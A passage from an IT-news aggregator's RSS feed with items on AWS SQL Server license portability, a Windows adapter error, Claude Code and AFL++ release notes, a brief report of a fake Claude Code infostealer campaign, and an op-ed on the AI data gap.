data-hovercard-type="user" data-hovercard-url="/users/ViewWay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ViewWay">@ViewWay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VinciZhu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VinciZhu">@VinciZhu</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vinoth12940/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vinoth12940">@vinoth12940</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vladkvlchk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vladkvlchk">@vladkvlchk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vynxevainglory-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vynxevainglory-ai">@vynxevainglory-ai</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wenchengxucool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wenchengxucool">@wenchengxucool</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/whyhkzk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/whyhkzk">@whyhkzk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/worlldz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/worlldz">@worlldz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wysie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wysie">@wysie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x1am1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x1am1">@x1am1</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygd58/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygd58">@ygd58</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/youngstar-eth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/youngstar-eth">@youngstar-eth</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zapabob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zapabob">@zapabob</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhaoleibd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhaoleibd">@zhaoleibd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zyrixtrex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zyrixtrex">@Zyrixtrex</a></p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.5.29.2...v2026.6.5">v2026.5.29.2...v2026.6.5</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS targets a longtime cloud migration blocker with SQL Server license portability]]></title>
<description><![CDATA[Licensing can be complicated, particularly when enterprises are forced to double-pay because the software they already own is only licensed for a specific environment, and moving it requires a whole different licensing model. Without proper portability rights, they need to make additional financi...]]></description>
<link>https://tsecurity.de/de/3576806/ai-nachrichten/aws-targets-a-longtime-cloud-migration-blocker-with-sql-server-license-portability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576806/ai-nachrichten/aws-targets-a-longtime-cloud-migration-blocker-with-sql-server-license-portability/</guid>
<pubDate>Sat, 06 Jun 2026 02:03:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Licensing can be complicated, particularly when enterprises are forced to double-pay because the software they already own is only licensed for a specific environment, and moving it requires a whole different licensing model. Without proper portability rights, they need to make additional financial investments to run the same workloads in a different home.</p>



<p>AWS says its new Bring Your Own Media (BYOM) service eliminates this duplication. Customers can now reuse their existing Microsoft SQL Server media and licenses on Amazon Relational Database Service (RDS) with no additional licensing fees.</p>



<p>This means enterprises no longer have to justify workload migrations to the cloud against existing licensing commitments and infrastructure investments, AWS said.</p>



<p>“What used to be a licensing barrier between operational SQL Server data and agentic AI is now gone,” AWS data engineer Srikanth Katakam and product marketing manager Colleen Betik wrote in a <a href="https://aws.amazon.com/blogs/database/unlock-license-mobility-with-bring-your-own-media-on-fully-managed-amazon-rds-for-sql-server/" target="_blank" rel="noreferrer noopener">blog post</a> announcing the service.</p>



<h2 class="wp-block-heading">Avoiding the double-licensing problem</h2>



<p>To drive true value, <a href="https://www.infoworld.com/article/4047863/three-tips-for-building-agentic-ai-systems-on-cloud-platforms.html" target="_blank">agentic AI apps</a> must have access to elastic GPU capacity as well as direct, low-latency access to the data they need to reason and make decisions. But, AWS argued, that can be difficult in self-managed data centers and on premises infrastructure with limited access to agentic AI cloud-native services. But a lot of enterprise data lives in Microsoft SQL Server, and until now customers have had to pay for a second license to use a fully managed cloud service like RDS.</p>



<p>Now, with BYOM on Amazon RDS for SQL Server, enterprises can reuse their existing SQL Server Enterprise Edition or Standard Edition licenses through a “lift-and-shift” model. This brings their data into a fully-managed environment.</p>



<p>According to the licensing distribution terms, enterprises must provide their licensed SQL Server Release to Manufacturing (RTM) media to Amazon RDS. They can then upload that media to <a href="https://www.infoworld.com/article/4155868/aws-turns-its-s3-storage-service-into-a-file-system-for-ai-agents.html" target="_blank">Amazon S3</a> and launch BYOM instances. Enterprises must configure AWS License Manager to perform automatic instance tracking.</p>



<p>From there, RDS automates patching, backups, high availability, and monitoring, while providing direct access to agentic AI and analytics services native to AWS. The platform also reports vCPU usage to provide visibility into SQL Server license usage, Katakam and Betik wrote.</p>



<p>“You do not need to choose between protecting your SQL Server licensing investments and giving your data a path to the AWS analytics and agentic AI services redefining what’s possible in the cloud,” they said. </p>



<p>It’s important to note that this service is only available to enterprises with Microsoft Software Assurance (SA), an add-on which supports mobility and rehosting of existing licenses. Enterprises must verify that their SQL Server licenses comply with Microsoft’s licensing agreement, and that they have a SQL Server License (Standard or Enterprise) with SA. They also must submit a License Mobility Verification Form to Microsoft; it, in turn, will notify AWS once verification is complete.</p>



<p>AWS emphasized that enterprises remain responsible for compliance; it does not block operations if license limits are exceeded.</p>



<h2 class="wp-block-heading">More control over workloads, loosening Microsoft’s grip</h2>



<p>The advantage of this service, explained <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Mike Leone</a>, principal analyst at Moor Insights &amp; Strategy, is that enterprises can get a Microsoft SQL Server workload onto a managed AWS service without rewriting it for Aurora or paying for the license twice. This means they can modernize on their own schedule rather than being forced into rewrites before they’re ready.</p>



<p>“For a lot of shops, that control over timing is worth more than the license saving itself,” Leone said.</p>



<p>This also loosens Microsoft’s grip on enterprise workloads, because organizations finally have somewhere else to run SQL Server using licenses they already own, he noted. Realistically, their dependency shifts to AWS rather than disappearing entirely, as their data ends up living next to AWS’s AI services.</p>



<p>“For a lot of teams, that’s a trade they’re glad to make for the managed infrastructure and the AI tooling they get in return,” Leone said.</p>



<p><a href="https://www.infotech.com/profiles/yaz-palanichamy" target="_blank" rel="noreferrer noopener">Yaz Palanichamy</a>, a senior advisory analyst at Info-Tech Research Group, also pointed to significant improvements stemming from the migration. Notably, it allows organizations to transition away from static, linear, or reactive storage capabilities towards more dynamically intelligent environments.</p>



<p>“The key is to balance the unification of transactional data towards managed AI and machine learning pipelines,” he said.</p>



<h2 class="wp-block-heading">Enterprises take on new responsibilities</h2>



<p>The catch? Leone noted that enterprises now own the task of licensing compliance. Staying current on SA, the Microsoft maintenance contract that makes any of this legal, and the license mobility rules, “become your headache instead of something baked into the bill,” he said.</p>



<p>Furthermore, he added, lift-and-shift has a way of turning into “lift-and-forget” when enterprises move SQL Server as-is and never actually modernize, “so you end up carrying all the old baggage onto a shinier platform.”</p>



<p>Palanichamy also pointed to skyrocketing AWS costs, since operationalizing AI agents requires a considerable amount of data ingestion and querying. This can potentially be cost prohibitive on RDS for SQL Server.</p>



<p>“One aspect to consider would be the relative time to production value, so that enterprises can better handle the management of volatile AI workloads,” he said.</p>



<h2 class="wp-block-heading">Just one challenge in the AI race</h2>



<p>Although AWS frames licensing complexity as a roadblock to agentic AI, analysts say it’s really just one piece of the puzzle.</p>



<p>Organizations are not in an AI-ready state due to a number of factors, Palanichamy noted. This could be total cost of ownership (TCO)-related, a lack of appropriate acceptable use policies (AUPs), or concerns around security and compliance.</p>



<p>If and when enterprises are ready to adopt AI, they must perform thorough needs analysis/process optimization benchmarking exercises to determine what workflows could benefit from the technology, he said, and, conversely, flag workflows where AI could prove “an impediment or potential disservice.”</p>



<p>Leone also pointed out that moving SQL Server onto RDS doesn’t “magically make your data agent-ready,” nor does it make it smarter. The data proximity and managed plumbing are what actually support agents. Sitting data next to Bedrock and the rest of <a href="https://www.infoworld.com/article/4143387/running-agents-with-amazon-bedrock-agentcore.html" target="_blank">AWS’s AI services</a> means builders “stop wasting time shipping the data around or building one-off integrations every time an agent needs it.”</p>



<p>Ultimately, though, licensing isn’t the real issue when it comes to AI; it’s more of a migration problem. The real roadblocks are messy data, questionable governance, and teams that aren’t ready to run it in production, and, Leone said, “no change to a license bill touches a single one of them.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The miniport has failed a power transition to operational power]]></title>
<description><![CDATA[Event ID 10317 indicates that your Wi-Fi or network adapter cannot resume from a low-power state. You may notice sudden network drops, slow reconnections, or a yellow exclamation mark in Device Manager. In this post, we are going to see what to do if your Event Viewer log throws 10317 and says Th...]]></description>
<link>https://tsecurity.de/de/3575611/windows-tipps/the-miniport-has-failed-a-power-transition-to-operational-power/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575611/windows-tipps/the-miniport-has-failed-a-power-transition-to-operational-power/</guid>
<pubDate>Fri, 05 Jun 2026 16:12:44 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="699" height="340" src="https://www.thewindowsclub.com/wp-content/uploads/2026/05/miniport-error.png" class="attachment-full size-full wp-post-image" alt="The miniport has failed a power transition to operational power" decoding="async" fetchpriority="high" srcset="https://www.thewindowsclub.com/wp-content/uploads/2026/05/miniport-error.png 699w, https://www.thewindowsclub.com/wp-content/uploads/2026/05/miniport-error-500x243.png 500w, https://www.thewindowsclub.com/wp-content/uploads/2026/05/miniport-error-300x146.png 300w" sizes="(max-width: 699px) 100vw, 699px">Event ID 10317 indicates that your Wi-Fi or network adapter cannot resume from a low-power state. You may notice sudden network drops, slow reconnections, or a yellow exclamation mark in Device Manager. In this post, we are going to see what to do if your Event Viewer log throws 10317 and says The miniport has failed […]</p>
<p>This article <a href="https://www.thewindowsclub.com/miniport-has-failed-a-power-transition-to-operational-power">The miniport has failed a power transition to operational power</a> first appeared on <a href="https://www.thewindowsclub.com/">TheWindowsClub.com</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.163]]></title>
<description><![CDATA[What's changed

Added requiredMinimumVersion and requiredMaximumVersion managed settings — Claude Code refuses to start if its version is outside the allowed range and directs the user to an approved version
Added /plugin list command to list installed plugins, with --enabled/--disabled filters
A...]]></description>
<link>https://tsecurity.de/de/3573977/downloads/v21163/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573977/downloads/v21163/</guid>
<pubDate>Fri, 05 Jun 2026 00:01:23 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>requiredMinimumVersion</code> and <code>requiredMaximumVersion</code> managed settings — Claude Code refuses to start if its version is outside the allowed range and directs the user to an approved version</li>
<li>Added <code>/plugin list</code> command to list installed plugins, with <code>--enabled</code>/<code>--disabled</code> filters</li>
<li>Added a "c to copy" shortcut to <code>/btw</code> that copies the raw markdown answer to the clipboard, preserving formatting when pasted elsewhere</li>
<li>Hooks: Stop and SubagentStop hooks can now return <code>hookSpecificOutput.additionalContext</code> to give Claude feedback and keep the turn going without being labeled a hook error</li>
<li>Skills: added <code>\$</code> escape syntax to include a literal <code>$</code> before a digit in command bodies</li>
<li>stdio MCP servers now receive the same <code>CLAUDE_CODE_SESSION_ID</code> as hooks/Bash on <code>--resume</code></li>
<li>Fixed <code>claude -p</code> hanging forever after its final result when a backgrounded command never exits — background shells are now stopped ~5s after the result once stdin closes</li>
<li>Fixed <code>claude -p</code> failing with "ANTHROPIC_API_KEY required" on Bedrock/Vertex/Foundry when <code>CI=true</code> and no Anthropic API key is set</li>
<li>Fixed bash commands failing under bazel and EDR-protected Go workflows: <code>$TMPDIR</code> was overridden to <code>/tmp/claude-{uid}</code> for all commands instead of only sandboxed ones (regression in 2.1.154)</li>
<li>Fixed Bash commands failing on Windows with "EEXIST: file already exists" on the session-env directory when it has the read-only attribute or is inside OneDrive</li>
<li>Fixed org-managed permission rules not applying for the entire session when the managed settings fetch completed during startup on a fresh config directory</li>
<li>Fixed background sessions in <code>claude agents</code> losing their running background tasks when reattached after a Claude Code update</li>
<li>Fixed terminal misalignment and a multi-second hang when exiting the agent view by pressing Esc</li>
<li>Fixed clicking Stop on a background-task chip in the desktop app not clearing the chip when the underlying process was already gone</li>
<li>Fixed keyboard input becoming permanently unresponsive after a paste operation whose end marker is dropped by the terminal</li>
<li>Fixed hook <code>if: "Bash(...)"</code> conditions firing on every Bash command containing <code>$()</code> or <code>$VAR</code>; the pattern now matches against commands inside subshells and backticks too</li>
<li>Fixed deny rules on home-directory paths (e.g. <code>Read(~/Desktop/**)</code>) not blocking Bash commands that reference the path via <code>$HOME</code></li>
<li>Fixed a stray "(no content)" line left in the transcript after closing panel dialogs like /mcp and /plugins</li>
<li>Background agent sessions now update to a new Claude Code version in the background, so opening a session after an update no longer waits on a cold restart</li>
<li>Clearer descriptions for built-in commands and skills in the / menu</li>
<li>The subscription-switch suggestion now shows in the startup announcement slot instead of a toast</li>
<li><code>claude agents</code> dispatching from the state-grouped view now starts the session in the directory the agent view was opened from</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybercriminals Impersonate Claude Code to Deploy Fileless .NET Infostealer]]></title>
<description><![CDATA[Cybercriminals are actively exploiting the growing popularity of AI development tools by using SEO poisoning to target new users of Anthropic’s Claude Code. Security researchers at Howler Cell have uncovered a sophisticated campaign that directs eager, non-technical builders to fake installation ...]]></description>
<link>https://tsecurity.de/de/3572531/it-security-nachrichten/cybercriminals-impersonate-claude-code-to-deploy-fileless-net-infostealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572531/it-security-nachrichten/cybercriminals-impersonate-claude-code-to-deploy-fileless-net-infostealer/</guid>
<pubDate>Thu, 04 Jun 2026 14:24:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybercriminals are actively exploiting the growing popularity of AI development tools by using SEO poisoning to target new users of Anthropic’s Claude Code. Security researchers at Howler Cell have uncovered a sophisticated campaign that directs eager, non-technical builders to fake installation pages. These spoofed pages use a social engineering technique known as ClickFix, which tricks […]</p>
<p>The post <a href="https://cyberpress.org/fake-claude-deploys-infostealer/">Cybercriminals Impersonate Claude Code to Deploy Fileless .NET Infostealer</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I used ChatGPT to find jobs and rewrite my resume — and it felt like having a personal recruiter]]></title>
<description><![CDATA[I tested ChatGPT's new job search and resume tools, and they helped me streamline my job hunt.]]></description>
<link>https://tsecurity.de/de/3572373/it-nachrichten/i-used-chatgpt-to-find-jobs-and-rewrite-my-resume-and-it-felt-like-having-a-personal-recruiter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572373/it-nachrichten/i-used-chatgpt-to-find-jobs-and-rewrite-my-resume-and-it-felt-like-having-a-personal-recruiter/</guid>
<pubDate>Thu, 04 Jun 2026 13:32:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I tested ChatGPT's new job search and resume tools, and they helped me streamline my job hunt.]]></content:encoded>
</item>
<item>
<title><![CDATA[The next AI breakthrough won’t come from bigger models, but from better data]]></title>
<description><![CDATA[Artificial intelligence does not advance at the same pace across industries. It presses forward in some directions while lagging behind in others.



Spend time with today’s most advanced AI applications, and this contrast becomes obvious. In software development, AI is quickly becoming ubiquitou...]]></description>
<link>https://tsecurity.de/de/3571975/ai-nachrichten/the-next-ai-breakthrough-wont-come-from-bigger-models-but-from-better-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571975/ai-nachrichten/the-next-ai-breakthrough-wont-come-from-bigger-models-but-from-better-data/</guid>
<pubDate>Thu, 04 Jun 2026 11:03:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Artificial intelligence does not advance at the same pace across industries. It presses forward in some directions while lagging behind in others.</p>



<p>Spend time with today’s most advanced AI applications, and this contrast becomes obvious. In software development, AI is quickly becoming ubiquitous. It writes production-ready code, explains obscure libraries, and iterates at a pace human teams have difficulty matching.</p>



<p>But place that same AI model inside a complex customer support workflow or ask it to reason through a nuanced clinical scenario, and the cracks begin to show. Multi-step reasoning falters. Context gets lost. Performance drops in ways that can seem inconsistent with the model’s strengths elsewhere.</p>



<p>These AI models are often similar. They run on similar hardware and are often trained in similar ways. So why the mismatch in performance across tasks? The simplest explanation is also the most overlooked: data.</p>



<p>Software engineering benefits from an immense, structured, and highly visible digital record. Code is written in standardized languages, benefits from robust documentation, is reviewed in public forums, and is discussed at scale. That ecosystem has generated a robust and massively useful pool of training material.</p>



<p>Other fields often do not. For example, healthcare data is scattered across institutions, wrapped in privacy constraints, expressed in multiple modalities, and rarely ready out-of-the-box for AI training. Enterprise workflows are captured in internal systems that were never designed for training AI. Multilingual speech data varies widely in quality and representation.</p>



<p>This imbalance creates what I describe as “the data gap.” This is the distance between what models are capable of in theory and what they can achieve in practice, because the right data does not yet exist in usable form. Closing this data gap may be the most important—and least glamorous—challenge in AI today.</p>



<h2 class="wp-block-heading">The missing pillar of AI progress</h2>



<p>Three forces are driving the recent advances in AI: the models, the chips, and the data.</p>



<p>On the AI models, the field has invested heavily. Major research organizations employ thousands of researchers and scientists who are actively refining architectures, training techniques, and evaluation methods. Breakthroughs are measured in benchmark scores, conference papers, and model performance on human tasks. On the computing chips, the investment has been equally intense. Hardware manufacturers and infrastructure providers are pouring billions of dollars into building and supporting data centers that deliver faster results via large-scale training.</p>



<p>Yet data has not received the same institutional focus for AI development. Conversations with researchers at frontier AI labs share a similar frustration that today’s model capabilities in key use cases, such as healthcare, are limited less by architectural imagination and more by the availability of high-quality, domain-specific data. The bottleneck is not always a lack of ideas, but a lack of reliable inputs.</p>



<p>We are long past scraping the internet for useful data, and this path does not scale. Progress depends on building and curating datasets that reflect the complexity of true lived experience and organizational processes. That work requires both scientific rigor and research specialization in the field of data for AI.</p>



<h2 class="wp-block-heading">The dataset behind every leap</h2>



<p>The <a href="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html" data-type="link" data-id="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html">history of AI</a> reinforces a consistent lesson: major leaps in model capability follow major leaps in the availability of quality data. From early vision systems that relied on clearly labeled images to today’s language models trained on massive text collections, each major leap has depended on access to more high-quality data.</p>



<p>Architectural innovation alone is rarely enough. The value of these new approaches only emerges when paired with large, structured, and representative datasets that reveal what the models can actually do in practice. Whether in vision or language, progress has depended on the painstaking work of collecting, organizing, and validating the underlying data.</p>



<p><a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" data-type="link" data-id="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">Large language models</a> illustrate this clearly. Their emergence was not just the result of better training techniques, but of access to an unprecedented volume of data. The models did not generate that data. They relied on it. That pattern raises a pressing question for the present: who is building the next generation of foundational datasets?</p>



<p>Across domains ranging from healthcare to audio to agentic task performance, there is no widely accepted blueprint. What constitutes a gold-standard dataset for training an AI agent to handle complex enterprise tasks? What does a clinically meaningful evaluation look like for a model that will assist in medical decision-making? How should multilingual speech data be curated to ensure broad representation and reliable performance?</p>



<p>These are not simple sourcing problems. They are fundamental research challenges that need to be solved.</p>



<h2 class="wp-block-heading">When data is treated as a commodity</h2>



<p>Too often, consequential data decisions are handled like procurement exercises. An organization requests “medical conversations” or “wildlife scenes,” and the request is routed to internal procurement or data sourcing teams, or to external data vendors, who assemble data that appears to match the description. The implicit assumption is that data is interchangeable, that one dataset is as good as another so long as it meets a basic specification.</p>



<p>Actual application suggests otherwise. Seemingly small choices about factors such as inclusion criteria, annotation standards, filtering rules, and validation protocols can dramatically alter downstream performance. Data design shapes model behavior as much as architecture does.</p>



<p>Three structural issues compound the problem:</p>



<ul class="wp-block-list">
<li><strong>Capacity: </strong>There are relatively few specialized teams dedicated to building domain-specific datasets at the highest level of rigor. Talent and funding have gravitated toward model development and hardware innovation. Data work often operates in the background, even though it underpins both.</li>



<li><strong>Design: </strong>Constructing a dataset is a distinct discipline from designing a neural network. It requires expertise in experimental design, domain knowledge, and statistical validation. Expecting model researchers to simultaneously shoulder the full burden of data research, while also training and evaluating the models, overlooks the complexity of the upstream task.</li>



<li><strong>Translation: </strong>The researchers who are requesting specific data sources to improve the models are often not the same people responsible for sourcing that data. As a result, nuances and research-backed expertise can often be missing or diluted as requests pass through layers of procurement and vendor relationships. The result can be data that meets the specification sheet, but in fact fails to advance model performance.</li>
</ul>



<p>The rise of annotation providers and reinforcement learning services has addressed part of the need. Rating model outputs, labeling text, and evaluating structured information are essential for many optimization tasks. But these activities generate data that is carefully constructed for specific, bounded purposes.</p>



<p>The frontier challenges in AI require more. They demand datasets derived from real human activity and organic organizational processes. Such data is complex, multimodal, and sensitive. It is rarely AI-ready by default. And converting it into reliable training and evaluation material is a scientific undertaking.</p>



<h2 class="wp-block-heading">The need for scientific rigor for the AI data layer</h2>



<p>If high-quality data is a central bottleneck, then scientific rigor is part of the solution. Just as leading model-builders have dedicated research labs and hardware has dedicated development ecosystems, the data layer for AI requires focused, scientifically-grounded institutions.</p>



<p>This means engaging directly with core questions like dataset design, evaluation methodology, and quality control. The conversation cannot end at volume; it must address data structure, representativeness, and expert validation.</p>



<p>Dataset construction must be approached as experimental design. Protocols must be documented and validated. Evaluation frameworks must test whether the dataset truly reflects the intended applications.</p>



<p>The field also requires standards and benchmarks that reflect real-world complexity, not simplified proxies. In healthcare, for instance, evaluating a system intended for clinical assistance with generic question-and-answer tests is insufficient. Real-world clinical environments involve multimodal inputs and contextual judgment. Benchmarks must reflect that reality if they are to function as meaningful gates before deployment.</p>



<p>Quality measurement is another crucial frontier. Finance relies on standardized metrics such as credit scores to assess risk. AI lacks an equivalent for datasets and benchmarks. Developing clear methodology to quantify dataset quality and evaluation reliability brings clarity to model assessment.</p>



<p>The criteria for evaluating a multilingual audio library will differ from those of a multimodal oncology dataset. Yet the underlying principle remains constant. Better models require better-defined, better-measured data.</p>



<h2 class="wp-block-heading">The risks of getting it wrong</h2>



<p>As AI systems move closer to high-stakes deployment, weak data practices carry tangible risks.</p>



<p>Benchmarks cannot be created with the same data that is used for training—that’s giving the test answers to the model ahead of time. Scaling data volume without prioritizing data quality and selection diminishes model performance gains, and can even bias against or omit underrepresented populations. These are methodological challenges, and ones that must be solved.</p>



<p>The rigor required at the data layer may not attract headlines. It does not typically lend itself to dramatic product launches. Yet the data layer for AI is foundational to trust, safety, and sustained progress for all AI progress.</p>



<h2 class="wp-block-heading">An ecosystem for the data era</h2>



<p>No single organization can resolve the data gap alone. What is needed is an ecosystem of AI data labs and research groups, each focused on different domains and challenges but united by a commitment to scientific discipline. These institutions would collaborate with model researchers and domain experts who would tackle challenges such as dataset contamination, factuality, groundedness, de-identification, international representation, and bias. They would design benchmarks that mirror real-world complexity rather than simplified abstractions.</p>



<p>AI’s trajectory will not be determined solely by larger models or faster chips. It will be shaped by the datasets we construct, the standards we adopt, and the rigor we apply at the foundation. The uneven frontier we see today reflects an uneven data landscape. Bridging the gap requires deliberate, research-driven dataset design.</p>



<p>If we want AI systems capable of operating reliably in clinical contexts, navigating enterprise workflows, and functioning responsibly across languages and cultures, we must treat data for AI as a first-class scientific endeavor.</p>



<p>AI models have their research labs. AI chip-builders have their fabrication plants. AI data needs institutions of equal seriousness and ambition.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v5.00c]]></title>
<description><![CDATA[Version ++5.00c (release)
! AFL++ is now an AGPL 3.0 project !
! Files where the license could be switched were moved to AGPL 3.0+, files
that were under Apache 2.0 with contributations stay on that license.
! Commercial license (donate to a good cause - no money for AFL++) is available

Switched...]]></description>
<link>https://tsecurity.de/de/3570226/it-security-tools/v500c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570226/it-security-tools/v500c/</guid>
<pubDate>Wed, 03 Jun 2026 18:03:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++5.00c (release)</h3>
<p>! AFL++ is now an AGPL 3.0 project !<br>
! Files where the license could be switched were moved to AGPL 3.0+, files<br>
that were under Apache 2.0 with contributations stay on that license.<br>
! Commercial license (donate to a good cause - no money for AFL++) is available</p>
<ul>
<li>Switched <a href="https://github.com/AFLplusplus/cov-analysis">https://github.com/AFLplusplus/cov-analysis</a> for outdated afl-cov</li>
<li>MacOS most current version support for afl-fuzz, afl-cc (incl. LTO) and<br>
frida mode!</li>
<li>Refreshed FreeBSD support by jsaunders-rr, thanks!</li>
<li>Linux persistent mode uses futex now which increases speed and reduces<br>
system call overhead (opt out with AFL_FAST_CHILD_SYNC), thanks to<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martinus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martinus">@martinus</a> for most of the implementation!</li>
<li>afl-fuzz:
<ul>
<li><code>-I tool</code> call now receives the new crash as a command line parameter</li>
<li>changed to a better map classifier</li>
<li>frameshift is disabled now if AFL_CUSTOM_MUTATOR_ONLY is set</li>
<li>python module fixes</li>
<li>minor speed, leak and zombie enhancements</li>
<li>stability info was lost on fast resume - fixed</li>
<li>somewhere we removed .state/variable/... now it is back :-)</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>Add LLVM 23 support</li>
<li>LTO and PCGUARD: new <code>AFL_LLVM_PATH</code> (also <code>AFL_LLVM_LTO_PATH</code> /<br>
<code>AFL_LLVM_PATH_MODE</code>) Ball-Larus per-function path coverage on top<br>
of edge coverage. Three levels: <code>=1</code> relaxed (collapse all<br>
guard-only BBs), <code>=2</code> restricted (collapse only 2-successor<br>
guard-only BBs), <code>=3</code> strict Ball-Larus. LTO additionally composes<br>
with <code>AFL_LLVM_LTO_CALLER</code>. See<br>
instrumentation/README.llvm.md and instrumentation/README.lto.md.</li>
<li>Fixes in the PCGUARD and LTO instrumentation that could lead to sanitizer<br>
triggers in target binaries</li>
<li>new instrumentation: <code>afl-llvm-bug-pass.so</code> provides five runtime<br>
oracles (SCALAR, BUDGET, SIZEFILL, ALLOCSIZE, SLACK) plus a slice-<br>
filter sub-mode for SCALAR, covering arithmetic-bound and logical-<br>
OOB bugs that ASan misses (<a title="CVE-2023-4863" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-j7hp-h8jx-5ppr/hovercard" href="https://github.com/advisories/GHSA-j7hp-h8jx-5ppr">CVE-2023-4863</a> / libwebp-Huffman class).<br>
Note: ALLOCSIZE/DERIVE are disabled automatically under<br>
AFL_USE_ASAN to avoid double-instrumentation; see<br>
docs/env_variables.md.
<ul>
